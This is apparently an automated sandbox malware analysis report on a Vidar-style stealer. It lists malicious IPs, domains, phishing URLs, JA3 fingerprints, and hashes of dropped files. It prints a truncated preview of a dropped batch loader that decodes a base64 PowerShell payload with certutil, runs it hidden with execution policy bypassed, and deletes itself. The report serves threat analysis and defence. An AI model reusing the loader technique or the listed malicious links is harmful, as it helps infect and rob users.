                                                                                                                                                                                                11:28:18API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                11:28:35API Interceptor1x Sleep call for process: putt.exe modified
                                                                                                                                                                                                11:28:40API Interceptor1x Sleep call for process: Corrections.com modified
                                                                                                                                                                                                11:29:18API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                IPs

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                239.255.255.250https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  https://t.co/4MnukUbNZXGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    https://cutt.ly/YeK13CIFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      http://uhsee.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#ankur.chowdhury@ctplc.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            https://6movies.stream/series/cobra-kai-80711/6-4/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              https://www.google.gr/url?url=https://pniuvlpkjqhdwff&exox=rvhqtix&eaydny=ysf&gzfds=lqrwiz&nci=qtwmzch&iccvb=yhwtsp&vtqs=avtajyu&oagvzgp=irlq&mvdoc=embwrj&yylmwei=tmn&mntt=qqcvuhkd&lkydbjfiod=izjcgyubqc&q=amp/anre6g6.j%c2%adh%c2%adhn%c2%adt%c2%addd%c2%adsm%c2%ado%c2%admcw%c2%adw%c2%adgu%c2%adno.com%e2%80%8b/99twfh3p8&gcyx=ncgobia&yfevoul=wtloixvv&hukl=qfkmtky&nlhwnbr=bwkoiopy&eqfw=bmcpntp&vlvegw=zdbpajeyq&ghrv=kcdfwrl&kyddme=myxsnvtxf&asco=mgumegd&dvvibf=hzfexefeg&osme=bdyguyp&njtjvd=bkelfwmxg&bxrb=ltpyjsv&girpat=lswjchrwc&qapj=wwwowde&vahefc=ghseyzgyf&ahaj=zfqmkuo&pfsfeu=ttucmtamu&sffs=oxaajjo&hbwhgy=mgfzglmmo&bdwl=oifsufx&befsmv=jskhtmnps&sfjy=powmsnr&zixjqp=jyttdwbmu&fzkp=hztiqjm&jmzuvc=ufyoeqgfi&zujr=jxtbdtg&plvxoh=fxumxxddw&nkin=ykbzrdh&lghzli=agvbttfta&suag=ioudcjc&zpptpx=dxacgdnox&hmfz=yueoymp&fnshpz=wgayslegy&gjtg=qcjjozv&rymask=thcxzfpca&zcgn=ywtonnx&kqrpog=kgfvcqswk&imwa=wlvocxf&ggqznt=budaflbgp&zjhr=zscgach&esrhmq=qjdngljnl&ppoz=nhwzlik&zejsqg=vnvpaymyl&dnqb=kjswpyt&kunwbg=pzauoqliz&bqlz=qabnsnu&dlfnsr=dakxdfzen&uffg=uwnswdr&ywjevz=bnvkfavcb&rrob=celdmvn&czdusr=sjfjazfqw&ipgr=exylggn&fltcvh=sdfsricvf&byfs=apntxot&javhwh=nyphchiee&owbh=haflpez&mbyvqw=pdzpxeedx&ejov=taakkyw&oylsfz=qnzuplrnz&hxrq=ovegslq&duqjcc=pjwdpyvec&uoec=pjouxrb&eiezwk=okbkttiao&knji=kcmfaqe&qmathj=vymnqrvxa&gajs=riewukz&czxhiu=uysriqpma&avwe=gssbenk&jnwgpb=iqkroelwx&sjyt=zhxfzpx&liqoqs=bbajxgpxm&dqqu=ztzooam&haagcu=gkijlwgjy&mnsq=uervedi&yckhpb=ngqrbrqpc&pkne=nwisdfz&eqsiqu=mlrhvpuavGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                https://selmanc.com/h4ba4.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  https://towergroupofcompany.com/wp-includes/blobcit.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    116.203.12.11469633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/img/favicon.ico
                                                                                                                                                                                                                              http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                              http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                              http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                              http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                              • t.me/cinoshibot

                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              t.me69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.26.10.61
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              sedone.online69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 116.203.12.241
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                              • 116.203.12.241
                                                                                                                                                                                                                              lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.241
                                                                                                                                                                                                                              Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.241
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                              • 116.203.12.241

                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              TELEGRAMRUugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                              HETZNER-ASDEhttps://6movies.stream/series/cobra-kai-80711/6-4/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 136.243.81.150
                                                                                                                                                                                                                              uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 116.202.150.27
                                                                                                                                                                                                                              JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 5.9.121.207
                                                                                                                                                                                                                              JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 136.243.3.194
                                                                                                                                                                                                                              https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 136.243.70.253
                                                                                                                                                                                                                              https://aweitapp.com/zeng/advance/authGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 144.76.181.177
                                                                                                                                                                                                                              69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 176.9.89.11
                                                                                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 188.40.187.161
                                                                                                                                                                                                                              NOKIA-ASFI69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 138.124.60.133
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                              • 138.124.35.95
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                              • 138.124.35.95
                                                                                                                                                                                                                              YPgggL1oh7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 138.124.34.218
                                                                                                                                                                                                                              rCKCW2iScd.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                              • 138.124.34.218
                                                                                                                                                                                                                              Z7JB7gZrXF.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                              • 138.124.34.218
                                                                                                                                                                                                                              46pPLyw8sN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                              • 138.124.34.218
                                                                                                                                                                                                                              TRC.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                              • 135.22.198.120
                                                                                                                                                                                                                              elitebotnet.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                              • 135.238.199.135
                                                                                                                                                                                                                              rebirth.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                              • 135.22.198.133

                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                              Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                              • 149.154.167.99

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              C:\ProgramData\37QQIEKNGVAA\QQ9RQQnB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      fim3BhyKXP.gifGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        TMX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                                                                                                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                                                                                                                                                                                                                                jE4zclRJU2.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  C:\Config.Msi\625ebe.rbs

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):557585
                                                                                                                                                                                                                                                  Entropy (8bit):6.439102144434479
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:pllcFz7UKez1EtOgU7Y4p4nle/DGWG5az:pyz7UcU7Y4p4KGLQ
                                                                                                                                                                                                                                                  MD5:DB946DFCA609FE0544C8F4C76D2B9CE8
                                                                                                                                                                                                                                                  SHA1:9402AD5C6A59E66FC59701B6B6B11CF3B371EDBA
                                                                                                                                                                                                                                                  SHA-256:180FAF9539000F087A80C3FA3D954323880DF18F92AB89AE57FA87B44053AF1B
                                                                                                                                                                                                                                                  SHA-512:0812C6AD0143D24A42998632BCB534806DA4CDECE2AA475735C08690CD6B0F11051CC81D3CF6728D91EACA59873F3AE4B285CE5DE67EB25F0DBF96616E13FEBA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}..KingSoft..Setup.msi.@.....@.....@.....@........&.{2FA3CD4B-28FE-4C2B-80E4-DCE280079806}.....@.....@.....@.....@.......@.....@.....@.......@......KingSoft......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{54726178-C674-486D-854B-BD331D9F11FB}&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}.@......&.{DE68DB34-02FE-4559-86D1-5AB24521AE4D}&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}.@......&.{1123B093-4171-4C7B-A7CC-3322A7CCA975}&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}.@......&.{05BD4742-3BAA-4DFE-8690-598F6240A7B3}&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}.@......&.{590CC74D-37DE-4058-AF20-60F01E547330}&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}.@......&.{D023D91C-307F-4BDB-82A8-0CF44BC35857}&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}.@........CreateFolders..Creating folders..Folder: [1]#.-.C:\Program Files (x86)\S

                                                                                                                                                                                                                                                  C:\Program Files (x86)\SoftPortable\KingSoft\1.bat

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (2360), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3026
                                                                                                                                                                                                                                                  Entropy (8bit):5.927213134380256
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:RX8ygv7n8uOG3to3P3/60ou073+SKY1HjXySKxW+J/tqb4si:F8Vj8itAPvPf0Lr1HzC/BT
                                                                                                                                                                                                                                                  MD5:16280F37BA6DD92F401C7948D4A7A8B8
                                                                                                                                                                                                                                                  SHA1:B102C3093C213622A1B3C94B6C700D2724F9ED8D
                                                                                                                                                                                                                                                  SHA-256:57FD6A012CEEA48FD4454B95AAC1A05329A74FD696FADA48BA400D187E133F69
                                                                                                                                                                                                                                                  SHA-512:2B908FCAC9DD643507447FB6B64C93F0C6E9589841AC2B10F3B0FAC7A45C996A2BB53EEC9E50C0500176C3F030A97AC93536B0419FF20DB05034D489326F0568
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:@echo off >nul..setlocal enabledelayedexpansion....set /a i=0..set "name=%temp%\%random%.ps1"....for /f "tokens=*" %%A in (%~n0.bat) do (.. set /a i+=1.. if !i! gtr 13 (.. set "line=%%A".. echo !line!>>%name%.. )..)..certutil -decode -f %name% %name%....:: ...... PowerShell . ....... ........echo Set objShell = CreateObject("WScript.Shell") > "%temp%\runner.vbs"..echo objShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""%name%""", 0, False >> "%temp%\runner.vbs"..cscript.exe //nologo "%temp%\runner.vbs"....del /F %temp%\runner.vbs..del /F %0..exit....-----BEGIN CERTIFICATE-----..IyDQn9GB0LXQstC00L7QvdC40LzRiyDQuCDQvtCx0YTRg9GB0LrQsNGG0LjRjwokYWxpYXMgPSAiSUVYIgokY21kID0gJ0FkZC1NcFByZWZlcmVuY2UgLUV4Y2x1c2lvblBhdGggIkM6XCInCgojINCS0YvQv9C+0LvQvdC10L3QuNC1INC60L7QvNCw0L3QtNGLCiYgJGFsaWFzICRjbWQKCiMg0JfQsNC00LXRgNC20LrQsCAxMCDRgdC10LrRg9C90LQKU3RhcnQtU2xlZXAgLVNlY29uZHMgMTAKCiMg0J/QtdGA0LXQvNC10L3QvdGL0LUg0YEg0L7QsdGE0YPRgdGG0LjRgNC+0LLQsNC

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\0HLFUK

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                                                                  Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                  MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                  SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                  SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                  SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\6F3E3ECTR

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\6XBS2D

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\9ZCBA1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\EKNYUS

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                  Encrypted:false
